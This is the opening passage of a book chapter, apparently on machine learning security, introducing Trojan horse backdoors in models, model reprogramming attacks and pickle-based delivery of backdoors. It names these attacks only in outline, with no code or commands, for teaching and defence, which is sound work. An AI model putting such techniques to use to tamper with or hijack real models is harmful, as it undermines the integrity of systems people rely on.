Model Tampering with Trojan Horses and Model Reprogramming
In the previous chapter, we looked at poisoning attacks and how subtle changes in the training data can affect the model’s integrity, enabling attackers to create backdoors triggered at inference time.
This chapter will look at more aggressive approaches to tampering with a model and creating backdoors, not by changing the data but by embedding small functionalities into the model. This is a Trojan horse approach to degrading model performance. It can also be used to hijack and repurpose a model, allowing attackers to use it for unintended functionality. We will look at model reprogramming attacks, too. These are more advanced techniques to hijack a model. We have already discussed pickles and the dangers they bring with traditional malicious code execution to exfiltrate data or spread malware.
This chapter will look at how pickle serialization can be exploited to deliver backdoors and with Trojan horses. We will...